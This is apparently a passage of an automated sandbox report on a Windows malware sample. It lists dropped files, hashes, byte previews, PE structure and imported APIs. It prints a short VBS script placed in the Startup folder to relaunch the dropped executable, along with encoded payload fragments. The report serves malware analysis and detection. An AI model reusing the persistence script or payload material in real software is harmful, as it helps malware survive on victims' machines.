                                      Preview:EA06.....CyT.]^.U..(.}..W..j .Ej.......H...4..E.....|.....I..Y.Iz.N..I<.sg.N..i...3......}-..cqK..C,.[k......3.'..v..6.&.Uk.l&....Wn..e5..fSh...3...S+...2.0.Aq.N%^P..q+.....<.~.x.P||...d..."T:.v.C..t.8....{.R.U.U.]jM^....V|...D..?...V#T........T.P...kRz.V.P...7ZU^.U..(.zU:.G.Zj.z.x...p....t..L.)..)....S....5z.....P@%..Ny.t.eX...N.....Q_.V.(1.U.T......,]'...iQ.|.@.........*H.G...E.L.D.(a..........JP.G..O'rY.....<.p.....[..>H...........vz..G.v.9......Q...E6.C..g.h>..H....../7..a3x...S.......Rs]..v.z.b.T.u.Zo..y..(..7g...omH....#.JG.W...pul..qW.s.5.]b...j#T........7--:..T.5.>.K..V>.J.o..-...W.-.G...y..x..Z...T..5.J?^GI.V.z.v.....{........@....y..T.F..j?K...E P....a...\-.c....>....W7.....H..-..U....=E3......u...c..N...P..+1.6v.... 1.VNu.......%...i...3...@:[y..cL...<k.j.H.M..{}~ES...u..V.T....`G[.U.o.S+e.. ..w;....h.*G.Q(......Z.W....z.b!c..xR..B...C;8.&V........@|...".b..5.9....l.tz.jo@.p..+.g.....^~m.. ..........@2..s...C...=v.T...8.^C...T*...

                                      C:\Users\user\AppData\Local\Temp\autA253.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9760
                                      Entropy (8bit):7.639171384559618
                                      Encrypted:false
                                      SSDEEP:192:ZAiDhJsp1HfWpDuKYdB1Qub5+k1FFdUa3tT1UQS2ZRvUWc30M:ZAi7sp5fW1Ihb5+kDY+t5PYkM
                                      MD5:948CA370E392DF65702ED9C1D85B601A
                                      SHA1:92DAE2F181AD0F53C7C16C0D2F60C2F21B5397D2
                                      SHA-256:185343A15FCD7136683C71E9633DFF552D110601BAA86065160A6E47B5384DC1
                                      SHA-512:C24D27116A850DC1F75574263E4FFCC436D01A513C5454E5328745AF7F3835C4FBF96E33807C554BB872EC86C895DFF04F37DAA71BD34E391B5E16F52703C10A
                                      Malicious:false
                                      Reputation:low
                                      Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...

                                      C:\Users\user\AppData\Local\Temp\iodization

                                      Download File
                                      Process:C:\Users\user\Desktop\DSD876543456780000.exe
                                      File Type:ASCII text, with very long lines (28674), with no line terminators
                                      Category:dropped
                                      Size (bytes):28674
                                      Entropy (8bit):3.585604397974273
                                      Encrypted:false
                                      SSDEEP:768:JxObwScFCo3T3iC2v53n2ntQUA+n++nmkE/ksf2HzOmL5sCWC:GbwScFCo3T3ifv53n2ntQUA+n++nmkEW
                                      MD5:8CB4BCD1782B001E47850EAD93D457A9
                                      SHA1:1AEAC30FFA29B71FC863096CC7D2919F6E139E06
                                      SHA-256:D7D1525BF5F73FD6A173AFE87005008B1FF43734A492C0CCAA302D411A6D149A
                                      SHA-512:987586188FE1A2298F5C8455840E42DC4AB0C27A161BB9ED0C38AADB0E6D67BB97571B5F7437F9DDA2913E8BF1B9C39FE82C2979BF081E58762BF8A3AA59D75A
                                      Malicious:false
                                      Reputation:low
                                      Preview:3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;

                                      C:\Users\user\AppData\Local\Temp\supergroups

                                      Download File
                                      Process:C:\Users\user\Desktop\DSD876543456780000.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):208384
                                      Entropy (8bit):7.779443462953202
                                      Encrypted:false
                                      SSDEEP:3072:e56cj7Se/x+hSJO+ulCrr2xhMGX+me2wgcP12gEsrzl4OoIyPb2kV/MkFRR7wG:evGzhR42Xcg3+6gyPbbJRR7B
                                      MD5:0F8BFEB615B60267E53709E260C3C291
                                      SHA1:8FCBE7323A46392EE07E6CA50EB854654F0CC485
                                      SHA-256:4A66B3362A7DDD57892E7F8D3AA9E1C46C868F348F54F4E5894691F34F7D36E1
                                      SHA-512:0B6A818C36CD2F496988851629C610BC67F3150D576DF3B4A9E1C37C7CFAF14FBDE0CFFD26294E3AA263E6E7AF5868C1DD9385F941F9D4A8ECC1655B1F7D2232
                                      Malicious:false
                                      Reputation:low
                                      Preview:...NKWCUUTGW..HW.UQTGWZN.WCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQT.WZNFH.[Q.N.{.I..t.<.$z>:8$'09g4; &87u31g%/ h>-u...w7!,2mX\^cWZNHWCU9D.zv?.)o$.*k&.0zt<+n%.)Q..)h$.*k&.0.&.+cw))F?.)qv8*.&.0zt8+|%.).'+?o$.*GWZNHWCUQTGWZNHW...2GWZN..CU.UCW..H.CUQTGWZN.W`TZUNWZ.IWC.PTGWZNg.CUQDGWZ.IWCU.TGGZNHUCUTTGWZNHWFUQTGWZNH'@UQPGW.uJWAUQ.GWJNHGCUQTWWZ^HWCUQTWWZNHWCUQTGW.[JW.UQTG7XN.ZBUQTGWZNHWCUQTGWZNHWCUQTGW..IW_UQTGWZNHWCUQTGWZNHWCUQTGWZN.ZAU.TGWZNHWCUQTG.[N.VCUQTGWZNHWCUQTGWZNHWCUQTGWt:-/7UQT_.[NHGCUQ.FWZJHWCUQTGWZNHWCUqTG7t<,674QT.:ZNH.BUQ:GWZ.IWCUQTGWZNHWCU.TG.t*)#"UQT.gZNHwAUQBGWZDJWCUQTGWZNHWCU.TG.t<;% UQT.Z[NH7AUQZFWZnJWCUQTGWZNHWCU.TG.ZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQTGWZNHWCUQT

                                      C:\Users\user\AppData\Local\nonsubmerged\chordates.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\DSD876543456780000.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1113600
                                      Entropy (8bit):7.005180587657202
                                      Encrypted:false
                                      SSDEEP:24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8aBqNN6hVF:STvC/MTQYxsWR7aBqN6
                                      MD5:F202040EB9D89916F413E67D59C7FD7F
                                      SHA1:84CE5B7CA29EB6E4A5290D21C4948D505C23A04A
                                      SHA-256:59337107A058BFD8EB4B8BC0506208D1EAB639B6FBD92AEFB156E7B21A1D3695
                                      SHA-512:683C959289660691FFFB1403137EC48D390A6CA140F1C76445A8CA90CE5D9A2C840AC1E3B167F1D99255382FEC5F02B724D87352E1E64F5D0D9D5E312612A65E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 38%
                                      Reputation:low
                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......f.........."..........N......w.............@..........................`......#.....@...@.......@.....................d...|....@..(........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(....@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs

                                      Download File
                                      Process:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):286
                                      Entropy (8bit):3.4256818806659766
                                      Encrypted:false
                                      SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1BKvf6nriIM8lfQVn:DsO+vNlzQ1Bof4mA2n
                                      MD5:19D6A57BD890E4472C6DEAEAA9453F74
                                      SHA1:898A614D7948AD8F03117560262EF2CD2BC44E08
                                      SHA-256:A68C9D9683F2870F00FE359B2B1DB793EA688B2F4EB584EDC7C88044F2B29989
                                      SHA-512:652748CA5150AFFDC8EA8267AEA033CC5A496D71AAC9963266F17696653CC46C1F50B00AF67908C87D4D19B1783DE6BDB9502C7F8C13040521B68FC89933BDEC
                                      Malicious:true
                                      Reputation:low
                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.n.o.n.s.u.b.m.e.r.g.e.d.\.c.h.o.r.d.a.t.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.005180587657202
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:DSD876543456780000.exe
                                      File size:1'113'600 bytes
                                      MD5:f202040eb9d89916f413e67d59c7fd7f
                                      SHA1:84ce5b7ca29eb6e4a5290d21c4948d505c23a04a
                                      SHA256:59337107a058bfd8eb4b8bc0506208d1eab639b6fbd92aefb156e7b21a1d3695
                                      SHA512:683c959289660691fffb1403137ec48d390a6ca140f1c76445a8ca90ce5d9a2c840ac1e3b167f1d99255382fec5f02b724d87352e1e64f5d0d9d5e312612a65e
                                      SSDEEP:24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8aBqNN6hVF:STvC/MTQYxsWR7aBqN6
                                      TLSH:DA35BF027391D022FF9B91734F5AF6115BBC6A660123E61F13A81DB9BE701B1163E7A3
                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                      File Icon

                                      Icon Hash:15192143534945d4

                                      Static PE Info

                                      General

                                      Entrypoint:0x420577
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66A08617 [Wed Jul 24 04:41:59 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:948cc502fe9226992dce9417f952fce3

                                      Entrypoint Preview

                                      Instruction
                                      call 00007FF310F3E7A3h
                                      jmp 00007FF310F3E0AFh
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007FF310F3E28Dh
                                      mov dword ptr [esi], 0049FDF0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FDF8h
                                      mov dword ptr [ecx], 0049FDF0h
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007FF310F3E25Ah
                                      mov dword ptr [esi], 0049FE0Ch
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FE14h
                                      mov dword ptr [ecx], 0049FE0Ch
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      and dword ptr [eax], 00000000h
                                      and dword ptr [eax+04h], 00000000h
                                      push eax
                                      mov eax, dword ptr [ebp+08h]
                                      add eax, 04h
                                      push eax
                                      call 00007FF310F40E4Dh
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      lea eax, dword ptr [ecx+04h]
                                      mov dword ptr [ecx], 0049FDD0h
                                      push eax
                                      call 00007FF310F40E98h
                                      pop ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      push eax
                                      call 00007FF310F40E81h
                                      test byte ptr [ebp+08h], 00000001h
                                      pop ecx

                                      Rich Headers

                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x39328.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x10e0000x7594.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0xd40000x393280x394009b6d1a1be2e3da009e88f47ed5808881False0.9474575259279476data7.9176369724718825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x10e0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xd44880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                      RT_ICON0xd45b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                      RT_ICON0xd46d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                      RT_ICON0xd48000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.20684803001876173
                                      RT_ICON0xd58a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.4698581560283688
                                      RT_MENU0xd5d100x50dataEnglishGreat Britain0.9
                                      RT_STRING0xd5d600x594dataEnglishGreat Britain0.3333333333333333
                                      RT_STRING0xd62f40x68adataEnglishGreat Britain0.2735961768219833
                                      RT_STRING0xd69800x490dataEnglishGreat Britain0.3715753424657534
                                      RT_STRING0xd6e100x5fcdataEnglishGreat Britain0.3087467362924282
                                      RT_STRING0xd740c0x65cdataEnglishGreat Britain0.34336609336609336
                                      RT_STRING0xd7a680x466dataEnglishGreat Britain0.3605683836589698
                                      RT_STRING0xd7ed00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                      RT_RCDATA0xd80280x34dd2data1.0003509906248558
                                      RT_GROUP_ICON0x10cdfc0x22dataEnglishGreat Britain1.0588235294117647
                                      RT_GROUP_ICON0x10ce200x14dataEnglishGreat Britain1.25
                                      RT_GROUP_ICON0x10ce340x14dataEnglishGreat Britain1.15
                                      RT_GROUP_ICON0x10ce480x14dataEnglishGreat Britain1.25
                                      RT_VERSION0x10ce5c0xdcdataEnglishGreat Britain0.6181818181818182
                                      RT_MANIFEST0x10cf380x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                      Imports

                                      DLLImport
                                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                      PSAPI.DLLGetProcessMemoryInfo
                                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                      UxTheme.dllIsThemeActive
                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
